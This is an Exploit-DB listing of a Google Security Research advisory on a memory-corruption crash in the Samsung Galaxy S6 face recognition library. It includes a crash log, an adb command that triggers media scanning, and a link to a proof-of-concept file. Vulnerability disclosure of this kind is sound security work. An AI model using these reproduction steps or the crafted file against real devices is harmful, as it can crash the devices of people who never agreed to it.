Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption

EDB-ID:

39425

CVE:

N/A

EDB Verified:

Author:

Google Security Research

Type:

dos

Exploit:   /  

Platform:

Android

Date:

2016-02-08

Vulnerable App: 
Source: https://code.google.com/p/google-security-research/issues/detail?id=616

The attached file causes memory corruption when iy is scanned by the face recognition library in android.media.process

F/libc    ( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
I/DEBUG   ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG   ( 3021): Revision: '10'
I/DEBUG   ( 3021): ABI: 'arm64'
I/DEBUG   ( 3021): pid: 4134, tid: 12161, name: syncThread  >>> android.process.media <<<
I/DEBUG   ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
I/DEBUG   ( 3021):     x0   3333333333333330  x1   0000007f714b6800  x2   000000000000001f  x3   3333333333333330
I/DEBUG   ( 3021):     x4   0000007f817fedb8  x5   0000007f7c1f4ea8  x6   0000007f7c1f4ec0  x7   0000007f7c109680
I/DEBUG   ( 3021):     x8   304b333333333333  x9   3033330333000000  x10  3333333333333333  x11  0103304b33333333
I/DEBUG   ( 3021):     x12  0000040033300311  x13  0300035033333333  x14  0300303333233333  x15  0000000000001484
I/DEBUG   ( 3021):     x16  0000007f74bfe828  x17  0000007f8c086008  x18  0000007f8c13b830  x19  0000007f7c279a00
I/DEBUG   ( 3021):     x20  0000000000000000  x21  0000007f7c1036a0  x22  0000007f817ff440  x23  0000007f7c279a10
I/DEBUG   ( 3021):     x24  0000000032d231a0  x25  0000000000000065  x26  0000000032d28880  x27  0000000000000065
I/DEBUG   ( 3021):     x28  0000000000000000  x29  0000007f817fecb0  x30  0000007f740be014
I/DEBUG   ( 3021):     sp   0000007f817fecb0  pc   0000007f740cefdc  pstate 0000000080000000
I/DEBUG   ( 3021): 
I/DEBUG   ( 3021): backtrace:
I/DEBUG   ( 3021):     #00 pc 0000000000065fdc  /system/lib64/libfacerecognition.so (MdConvertLine+28)
I/DEBUG   ( 3021):     #01 pc 0000000000055010  /system/lib64/libfacerecognition.so (MCC_Process+160)

To reproduce, download the attached file and wait, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39425.zip
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services